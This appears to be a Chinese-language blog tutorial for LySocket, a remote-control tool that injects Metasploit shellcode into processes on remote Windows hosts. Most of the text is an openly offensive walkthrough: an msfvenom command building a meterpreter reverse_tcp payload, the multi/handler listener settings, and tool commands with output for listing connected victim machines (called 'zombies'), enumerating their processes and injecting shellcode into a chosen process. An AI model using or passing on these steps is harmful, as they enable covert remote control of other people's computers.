LySocket远程ShellCode种植远控


LySocket 是一款使用纯 WindowsAPI 实现的命令行版远程控制工具,该工具通过最少的代码实现了套接字的批量管理操作,用户可以指定对远程主机内特定进程注入ShellCode攻击载荷,只要对端LyClient客户端能一直运行,则Metasploit攻击载荷就可以很方便的注入到目标主机任意的进程内反弹。

GitHUB地址:https://github.com/lyshark/LySocket

首先需要通过Metasploit工具生成一个有效载荷。

[root@lyshark ~]# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.93.128 LPORT=9999 -f c

后台侦听器的配置,使用时需要与载荷的位数相对应。

msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set lhost 192.168.93.128
msf6 > set lport 9999
msf6 exploit(multi/handler) > exploit
  • 输出当前在线的客户端列表

命令ShowSocket可输出当前有多少肉鸡上线了,用于确定对端IP地址,该套接字列表程序内会自动维护,如果客户端下线则Socket套接字将会被清理。

[ LySocket ] # ShowSocket
--------------------------------------------------------------------
索引 客户端地址 端口 状态
--------------------------------------------------------------------
0 127.0.0.1 1763 Open
1 127.0.0.1 1806 Open
2 127.0.0.1 1807 Open
3 127.0.0.1 1808 Open
--------------------------------------------------------------------
  • 获取客户端进程列表

命令GetProcessList可用于得到对段主机内有哪些进程正在运行,这是注入代码的前提条件。

[ LySocket ] # GetProcessList --address 127.0.0.1
--------------------------------------------------------------------
索引 进程PID 进程位数 进程名
--------------------------------------------------------------------
0 4 x64 System
1 124 x64 Registry
2 568 x64 smss.exe
3 856 x64 csrss.exe
4 956 x64 wininit.exe
5 964 x64 csrss.exe
6 80 x64 services.exe
7 484 x64 lsass.exe
8 564 x64 winlogon.exe
9 672 x64 svchost.exe
10 1060 x64 fontdrvhost.exe
11 1068 x64 fontdrvhost.exe
12 1100 x64 WUDFHost.exe
--------------------------------------------------------------------
  • 注入ShellCode到指定进程内

使用如下命令注入ShellCode到特定进程内,此时Metasploit即可看到反弹的了。

[ LySocket ] # InjectRemoteCode --address 127.0.0.1 --pid 1068 --shellcode xfec12defferciruq
[+] Success..